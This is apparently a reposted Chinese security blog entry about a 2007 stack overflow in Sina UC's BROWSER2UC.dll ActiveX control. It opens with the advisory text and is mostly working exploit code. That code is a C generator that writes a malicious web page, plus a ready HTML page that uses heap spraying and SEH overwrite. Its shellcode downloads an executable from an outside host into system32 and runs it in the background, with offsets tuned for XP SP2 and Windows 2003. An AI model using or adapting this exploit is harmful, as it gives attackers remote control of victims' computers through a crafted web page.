鬼仔:我编译了下,下载地址:
2007011012544.rar
来源:Ph4nt0m
//////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 新浪UC ActiveX多个远程栈溢出漏洞
//
// Sowhat of Nevis Labs
// 日期: 2007.01.09
//
// http://www.nevisnetworks.com
// http://secway.org/advisory/20070109EN.txt
// http://secway.org/advisory/20070109CN.txt
//
// CVE: 暂无
//
// 厂商
//
// Sina Inc.
//
// 受影响的版本:
// Sina UC <=UC2006
//
// Overview:
// 新浪UC是中国非常流行的IM工具之一
//
// http://www.51uc.com
//
// 细节:
//
// 漏洞的起因是Sina UC的多个ActiveX控件的参数缺乏必要的验证,攻击者构造恶意网页,可以远程完全控制安装了Sina UC
// 的用户的计算机,
//
// 多个控件存在栈溢出问题,包括但不限于:
//
// 1. clsid:77AE4780-75E0-4CB0-A162-D1BBE3D50384
// C:/Program Files/sina/UC/ActiveX/BROWSER2UC.dll
//
// Sub SendChatRoomOpt (
// ByVal astrVerion As String ,
// ByVal astrUserID As String ,
// ByVal asDataType As Integer ,
// ByVal alTypeID As Long
// )
//
// 当第1个参数是一个超常字符串时,发生栈溢出,SEH被覆盖,攻击者可以执行任意代码
//////////////////////////////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Sina UC 2006 Activex SendChatRoomOpt Exploit
// Code by 云舒 & LuoLuo,ph4nt0morg
//////////////////////////////////////////////////////////////////////////////////////////////////////////////
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <string.h>
FILE *fp = NULL;
char *file = "fuck_uc.html";
char *url = NULL;
unsigned char sc[] =
"/x60/x64/xa1/x30/x00/x00/x00/x8b/x40/x0c/x8b/x70/x1c/xad/x8b/x70"
"/x08/x81/xec/x00/x04/x00/x00/x8b/xec/x56/x68/x8e/x4e/x0e/xec/xe8"
"/xff/x00/x00/x00/x89/x45/x04/x56/x68/x98/xfe/x8a/x0e/xe8/xf1/x00"
"/x00/x00/x89/x45/x08/x56/x68/x25/xb0/xff/xc2/xe8/xe3/x00/x00/x00"
"/x89/x45/x0c/x56/x68/xef/xce/xe0/x60/xe8/xd5/x00/x00/x00/x89/x45"
"/x10/x56/x68/xc1/x79/xe5/xb8/xe8/xc7/x00/x00/x00/x89/x45/x14/x40"
"/x80/x38/xc3/x75/xfa/x89/x45/x18/xe9/x08/x01/x00/x00/x5e/x89/x75"
"/x24/x8b/x45/x04/x6a/x01/x59/x8b/x55/x18/x56/xe8/x8c/x00/x00/x00"
"/x50/x68/x36/x1a/x2f/x70/xe8/x98/x00/x00/x00/x89/x45/x1c/x8b/xc5"
"/x83/xc0/x50/x89/x45/x20/x68/xff/x00/x00/x00/x50/x8b/x45/x14/x6a"
"/x02/x59/x8b/x55/x18/xe8/x62/x00/x00/x00/x03/x45/x20/xc7/x00/x5c"
"/x7e/x2e/x65/xc7/x40/x04/x78/x65/x00/x00/xff/x75/x20/x8b/x45/x0c"
"/x6a/x01/x59/x8b/x55/x18/xe8/x41/x00/x00/x00/x6a/x07/x58/x03/x45"
"/x24/x33/xdb/x53/x53/xff/x75/x20/x50/x53/x8b/x45/x1c/x6a/x05/x59"
"/x8b/x55/x18/xe8/x24/x00/x00/x00/x6a/x00/xff/x75/x20/x8b/x45/x08"
"/x6a/x02/x59/x8b/x55/x18/xe8/x11/x00/x00/x00/x81/xc4/x00/x04/x00"
"/x00/x61/x81/xc4/xdc/x04/x00/x00/x5d/xc2/x24/x00/x41/x5b/x52/x03"
"/xe1/x03/xe1/x03/xe1/x03/xe1/x83/xec/x04/x5a/x53/x8b/xda/xe2/xf7"
"/x52/xff/xe0/x55/x8b/xec/x8b/x7d/x08/x8b/x5d/x0c/x56/x8b/x73/x3c"
"/x8b/x74/x1e/x78/x03/xf3/x56/x8b/x76/x20/x03/xf3/x33/xc9/x49/x41"
"/xad/x03/xc3/x56/x33/xf6/x0f/xbe/x10/x3a/xf2/x74/x08/xc1/xce/x0d"
"/x03/xf2/x40/xeb/xf1/x3b/xfe/x5e/x75/xe5/x5a/x8b/xeb/x8b/x5a/x24"
"/x03/xdd/x66/x8b/x0c/x4b/x8b/x5a/x1c/x03/xdd/x8b/x04/x8b/x03/xc5"
"/x5e/x5d/xc2/x08/x00/xe8/xf3/xfe/xff/xff/x55/x52/x4c/x4d/x4f/x4e"
"/x00";
char * header =
"<!--/n"
"clsid:77AE4780-75E0-4CB0-A162-D1BBE3D50384/n"
"C://Program Files//sina//UC//ActiveX//BROWSER2UC.dll/n/n"
"Sub SendChatRoomOpt (/n"
" ByVal astrVerion As String ,/n"
" ByVal astrUserID As String ,/n"
" ByVal asDataType As Integer ,/n"
" ByVal alTypeID As Long/n"
")/n/n"
"ph4nt0m.org, Code By 云舒 & LuoLuo/n"
"!-->/n/n"
"<html>/n"
"<head>/n"
"<script language=/"javascript/">/n"
"var heapSprayToAddress = 0x0c0c0c0c;/n"
"var shellcode = unescape(/"%u9090/"+/"%u9090/"+ /n";
char * footer =
"/n"
"var heapBlockSize = 0x100000;/n"
"var payLoadSize = shellcode.length * 2;/n"
"var spraySlideSize = heapBlockSize - (payLoadSize+0x38);/n"
"var spraySlide = unescape(/"%u9090%u9090/");/n/n"
"spraySlide = getSpraySlide(spraySlide,spraySlideSize);/n"
"heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize;/n"
"memory = new Array();/n/n"
"for (i=0;i<heapBlocks;i++)/n{/n"
"/t/tmemory[i] = spraySlide + shellcode;/n}/n"
"function getSpraySlide(spraySlide, spraySlideSize)/n{/n/t"
"while (spraySlide.length*2<spraySlideSize)/n/t"
"{/n/t/tspraySlide += spraySlide;/n/t}/n"
"/tspraySlide = spraySlide.substring(0,spraySlideSize/2);/n/treturn spraySlide;/n}/n/n";
// print unicode shellcode
void PrintPayLoad(char *lpBuff, int buffsize)
{
int i;
for(i=0;i < buffsize;i+=2)
{
if((i%16)==0)
{
if(i!=0)
{
fprintf(fp, "%s", "/" +/n/"");
}
else
{
fprintf(fp, "%s", "/"");
}
}
fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
}
//把shellcode打印在header后面,然后用 " ) " 闭合
fprintf(fp, "%s", "/");/n");
}
int main( int argc, char *argv[] )
{
if( argc != 3 )
{
printf( "/nUC ActiveX object exp,Code by 云舒 & LuoLuo,ph4nt0morg/n" );
printf( "Usage: %s <url> <os>/n", argv[0] );
printf( " 1 Windows XP SP2 Chinese version,IE 6/n" );
printf( " 2 Windows 2003 standard SP1 Chinese Version, IE 6/n" );
return -1;
}
char seh[1024] = { 0 };
int os = atoi( argv[2] );
int len = 0;
if( os == 1 )
{
len = 3133;
}
else if( os == 2 )
{
len = 3193;
}
sprintf( seh , "var obj = new ActiveXObject(/"BROWSER2UC.BROWSERToUC/");/n/tvar arg1;/n/n<!-- Windows2003 standard SP1 + IE6 此处覆盖长度i为3193 -->/n<!-- Windows XP SP2 + IE6 此处覆盖长度i为3133 -->/n/nfor( var i = 0; i < %d; i ++ )/n{/targ1 += /"A/";/n}arg1=arg1 + unescape(/"%%0c%%0c%%0c%%0c/");/narg2=/"defaultV/";/narg3=1;/narg4=1;/nobj.SendChatRoomOpt(arg1 ,arg2 ,arg3 ,arg4);/n</script>/n</head>/n</html>", len );
url = argv[1];
if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10)
{
printf("[-] Invalid url. Must start with 'http://','ftp://'/n");
return -1;
}
printf("[+] download url:%s/n", url);
fp = fopen( file , "w" );
if( fp == NULL )
{
printf( "Create file error: %d/n", GetLastError() );
return -1;
}
fprintf( fp, "%s", header );
fflush( fp );
char buffer[4096] = { 0 };
int sc_len = sizeof(sc)-1;
memcpy(buffer, sc, sc_len);
memcpy(buffer+sc_len, url, strlen(url));
sc_len += strlen(url)+1;
PrintPayLoad((char *)buffer, sc_len);
fflush( fp );
fprintf( fp, "%s", footer );
fprintf( fp, "%s", seh );
fflush( fp );
fclose( fp );
printf( "Create done!please look %s/n", file );
}
UC BROWSER2UC.dll溢出演示代码
今天和LuoLuo测试了下,写成了这个测试代码。网页会下载我blog的http://icylife.net/1.exe,这个是记事本,下载到system32保存为~.exe并后台运行。生成器晚上再写哈,朕饿了。
这个我们测试了
<!– Windows2003 standard SP1 + IE6 此处覆盖长度i为3193 –>
<!– Windows XP SP2 + IE6 此处覆盖长度i为3133 –>
不过IE7还不能利用,晚上再加通过JS判断系统类型的部分,这样就不用修改i的值了,现在针对系统需要修改。
<!--
1. clsid:77AE4780-75E0-4CB0-A162-D1BBE3D50384
C:Program FilessinaUCActiveXBROWSER2UC.dll
Sub SendChatRoomOpt (
ByVal astrVerion As String ,
ByVal astrUserID As String ,
ByVal asDataType As Integer ,
ByVal alTypeID As Long
)
Code By 云舒 & LuoLuo
! -->
<html>
<head>
<script language="javascript">
var heapSprayToAddress = 0x0c0c0c0c;
var shellcode = unescape("%u9090"+"%u9090"+
"%u6460%u30a1%u0000%u8b00%u0c40%u708b%uad1c%u708b" +
"%u8108%u00ec%u0004%u8b00%u56ec%u8e68%u0e4e%ue8ec" +
"%u00ff%u0000%u4589%u5604%u9868%u8afe%ue80e%u00f1" +
"%u0000%u4589%u5608%u2568%uffb0%ue8c2%u00e3%u0000" +
"%u4589%u560c%uef68%ue0ce%ue860%u00d5%u0000%u4589" +
"%u5610%uc168%ue579%ue8b8%u00c7%u0000%u4589%u4014" +
"%u3880%u75c3%u89fa%u1845%u08e9%u0001%u5e00%u7589" +
"%u8b24%u0445%u016a%u8b59%u1855%ue856%u008c%u0000" +
"%u6850%u1a36%u702f%u98e8%u0000%u8900%u1c45%uc58b" +
"%uc083%u8950%u2045%uff68%u0000%u5000%u458b%u6a14" +
"%u5902%u558b%ue818%u0062%u0000%u4503%uc720%u5c00" +
"%u2e7e%uc765%u0440%u6578%u0000%u75ff%u8b20%u0c45" +
"%u016a%u8b59%u1855%u41e8%u0000%u6a00%u5807%u4503" +
"%u3324%u53db%uff53%u2075%u5350%u458b%u6a1c%u5905" +
"%u558b%ue818%u0024%u0000%u006a%u75ff%u8b20%u0845" +
"%u026a%u8b59%u1855%u11e8%u0000%u8100%u00c4%u0004" +
"%u6100%uc481%u04dc%u0000%uc25d%u0024%u5b41%u0352" +
"%u03e1%u03e1%u03e1%u83e1%u04ec%u535a%uda8b%uf7e2" +
"%uff52%u55e0%uec8b%u7d8b%u8b08%u0c5d%u8b56%u3c73" +
"%u748b%u781e%uf303%u8b56%u2076%uf303%uc933%u4149" +
"%u03ad%u56c3%uf633%ube0f%u3a10%u74f2%uc108%u0dce" +
"%uf203%ueb40%u3bf1%u5efe%ue575%u8b5a%u8beb%u245a" +
"%udd03%u8b66%u4b0c%u5a8b%u031c%u8bdd%u8b04%uc503" +
"%u5d5e%u08c2%ue800%ufef3%uffff%u5255%u4d4c%u4e4f" +
"%u6800%u7474%u3a70%u2f2f%u6369%u6c79%u6669%u2e65" +
"%u656e%u2f74%u2e31%u7865%u0065");
var heapBlockSize = 0x100000;
var payLoadSize = shellcode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u9090%u9090");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + shellcode;
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
var obj = new ActiveXObject("BROWSER2UC.BROWSERToUC");
var arg1;
<!-- Windows2003 standard SP1 + IE6 此处覆盖长度i为3193 -->
<!-- Windows XP SP2 + IE6 此处覆盖长度i为3133 -->
for( var i = 0; i < 3133; i ++ )
{
arg1 += "A";
}
arg1=arg1 + unescape("%0c%0c%0c%0c");
arg2="defaultV";
arg3=1;
arg4=1;
obj.SendChatRoomOpt(arg1 ,arg2 ,arg3 ,arg4);
</script>
</head>
</html>
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论